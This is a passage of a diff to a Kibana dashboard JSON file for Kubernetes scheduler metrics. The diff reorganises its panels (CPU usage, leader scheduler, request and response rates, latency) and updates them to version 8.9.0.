"operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.process.cpu.sec))", - "isFormulaBroken": false - }, - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X1" - ], - "scale": "ratio" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.cpu.sec: *" - }, - "isBucketed": false, - "label": "Part of Increase in Scheduler CPU", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.cpu.sec" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Increase in Scheduler CPU", - "operationType": "counter_rate", - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 20 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", - "key": "kubernetes.scheduler.process.cpu.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.process.cpu.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "52732cce-1342-46e1-8273-82efeffe9aac": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Leader scheduler name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "hideEndzones": false, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989" - ], - "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "yConfig": [ - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { + "dataType": "boolean", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.leader.is_master: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.scheduler.leader.is_master", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.leader.is_master" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f3653393-ef8e-45e9-8b91-5a0472ecf752", + "key": "kubernetes.scheduler.leader.is_master", + "negate": false, + "params": { + "query": true }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "1604f0de-edd6-456e-8670-ab9b33988abb", - "w": 24, - "x": 0, - "y": 66 - }, - "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", - "title": "CPU usage increase over time", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(249,235,223,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "HTTP Requests", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true - }, - "title": "", - "type": "metrics", - "uiState": {} + "type": "phrase" + }, + "query": { + "match_phrase": { + "kubernetes.scheduler.leader.is_master": true } - }, - "gridData": { - "h": 3, - "i": "f8313a9d-ab58-448e-b183-75f914caf53f", - "w": 48, - "x": 0, - "y": 78 - }, - "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", - "title": "", - "type": "visualization", - "version": "8.6.0" + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", + "isTransposed": false, + "width": 256.6666666666667 + }, + { + "columnId": "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "isTransposed": false, + "width": 345.66666666666663 + } + ], + "headerRowHeight": "auto", + "layerId": "1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "layerType": "data", + "rowHeight": "auto" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Leader scheduler" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "e70eea20-8653-4340-b6dd-620090d3cf7a", + "w": 24, + "x": 24, + "y": 81 + }, + "panelIndex": "e70eea20-8653-4340-b6dd-620090d3cf7a", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis > @timestamp > Minimum interval**.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "w": 24, + "x": 24, + "y": 86 + }, + "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { + "columnOrder": [ + "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "8a2e9cea-60fb-4603-a072-9b0e6194344c", + "63268365-bb35-456f-831c-78238984a061", + "63268365-bb35-456f-831c-78238984a061X0", + "63268365-bb35-456f-831c-78238984a061X1", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0", + "00501c90-b23d-4bca-9354-eb2c48236139", + "00501c90-b23d-4bca-9354-eb2c48236139X1", + "00501c90-b23d-4bca-9354-eb2c48236139X0" + ], + "columns": { + "00501c90-b23d-4bca-9354-eb2c48236139": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.schedule.code >= 500" + }, + "isBucketed": false, + "label": "Server errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } }, - { - "id": "metrics-*", - "name": "f3653393-ef8e-45e9-8b91-5a0472ecf752", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { - "columnOrder": [ - "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "52732cce-1342-46e1-8273-82efeffe9aac", - "469efac9-749a-455e-9864-90dc0f5f954e", - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" - ], - "columns": { - "37b94d21-2d12-4136-a81d-908d8fc7f78a": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "orchestrator.cluster.name" - }, - "469efac9-749a-455e-9864-90dc0f5f954e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "52732cce-1342-46e1-8273-82efeffe9aac": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Leader scheduler name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - }, - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { - "dataType": "boolean", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.leader.is_master: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.scheduler.leader.is_master", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.leader.is_master" - } - }, - "incompleteColumns": {} - } - } - } + "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "00501c90-b23d-4bca-9354-eb2c48236139X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "00501c90-b23d-4bca-9354-eb2c48236139X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.schedule.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.count" + }, + "00501c90-b23d-4bca-9354-eb2c48236139X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.schedule.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "counter_rate", + "references": [ + "00501c90-b23d-4bca-9354-eb2c48236139X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.code >= 400 and kubernetes.scheduler.code < 500" + }, + "isBucketed": false, + "label": "Client errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f3653393-ef8e-45e9-8b91-5a0472ecf752", - "key": "kubernetes.scheduler.leader.is_master", - "negate": false, - "params": { - "query": true - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "kubernetes.scheduler.leader.is_master": true - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.code >= 400 and kubernetes.scheduler.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.count" + }, + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.code >= 400 and kubernetes.scheduler.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "counter_rate", + "references": [ + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "63268365-bb35-456f-831c-78238984a061": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", - "isTransposed": false, - "width": 256.6666666666667 - }, - { - "columnId": "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", - "hidden": true, - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "isTransposed": false, - "width": 345.66666666666663 - } - ], - "headerRowHeight": "auto", - "layerId": "1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "layerType": "data", - "rowHeight": "auto" - } + "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "63268365-bb35-456f-831c-78238984a061X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "668a51aa-98da-465e-9b09-d49e4f219968", - "w": 24, - "x": 0, - "y": 81 - }, - "panelIndex": "668a51aa-98da-465e-9b09-d49e4f219968", - "title": "Leader scheduler", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "63268365-bb35-456f-831c-78238984a061X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.count" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis \u003e @timestamp \u003e Minimum interval**.", - "openLinksInNewTab": false + "63268365-bb35-456f-831c-78238984a061X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "counter_rate", + "references": [ + "63268365-bb35-456f-831c-78238984a061X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} + "8a2e9cea-60fb-4603-a072-9b0e6194344c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { + "dataType": "string", + "isBucketed": true, + "label": "Top values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.scheduler.method", + "kubernetes.scheduler.code" + ], + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.host" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 5, - "i": "e70eea20-8653-4340-b6dd-620090d3cf7a", - "w": 24, - "x": 24, - "y": 81 + "layers": [ + { + "accessors": [ + "63268365-bb35-456f-831c-78238984a061", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", + "00501c90-b23d-4bca-9354-eb2c48236139" + ], + "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "e70eea20-8653-4340-b6dd-620090d3cf7a", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { - "columnOrder": [ - "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "8a2e9cea-60fb-4603-a072-9b0e6194344c", - "63268365-bb35-456f-831c-78238984a061", - "63268365-bb35-456f-831c-78238984a061X0", - "63268365-bb35-456f-831c-78238984a061X1", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0", - "00501c90-b23d-4bca-9354-eb2c48236139", - "00501c90-b23d-4bca-9354-eb2c48236139X1", - "00501c90-b23d-4bca-9354-eb2c48236139X0" - ], - "columns": { - "00501c90-b23d-4bca-9354-eb2c48236139": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.schedule.code \u003e= 500" - }, - "isBucketed": false, - "label": "Server errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "00501c90-b23d-4bca-9354-eb2c48236139X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "00501c90-b23d-4bca-9354-eb2c48236139X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.schedule.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.count" - }, - "00501c90-b23d-4bca-9354-eb2c48236139X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.schedule.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "counter_rate", - "references": [ - "00501c90-b23d-4bca-9354-eb2c48236139X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.code \u003e= 400 and kubernetes.scheduler.code \u003c 500" - }, - "isBucketed": false, - "label": "Client errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.code \u003e= 400 and kubernetes.scheduler.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.count" - }, - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.code \u003e= 400 and kubernetes.scheduler.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "counter_rate", - "references": [ - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Requests", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "63268365-bb35-456f-831c-78238984a061X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.count" - }, - "63268365-bb35-456f-831c-78238984a061X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "counter_rate", - "references": [ - "63268365-bb35-456f-831c-78238984a061X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "8a2e9cea-60fb-4603-a072-9b0e6194344c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { - "dataType": "string", - "isBucketed": true, - "label": "Top values", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.scheduler.method", - "kubernetes.scheduler.code" - ], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.host" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Requests and responses counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "w": 24, + "x": 0, + "y": 87 + }, + "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { + "columnOrder": [ + "35a11916-4ca3-421b-9df2-521f52f21fbb", + "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "43097f7a-e478-47bc-81c1-7541bd899d46", + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1", + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "columns": { + "35a11916-4ca3-421b-9df2-521f52f21fbb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "63268365-bb35-456f-831c-78238984a061", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", - "00501c90-b23d-4bca-9354-eb2c48236139" - ], - "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "secondaryFields": [ + "kubernetes.scheduler.verb" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.host" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "w": 24, - "x": 24, - "y": 86 - }, - "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "title": "Requests and responses counter rate", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { - "columnOrder": [ - "35a11916-4ca3-421b-9df2-521f52f21fbb", - "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "43097f7a-e478-47bc-81c1-7541bd899d46", - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1", - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "columns": { - "35a11916-4ca3-421b-9df2-521f52f21fbb": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.scheduler.verb" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.host" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency in ms", - "operationType": 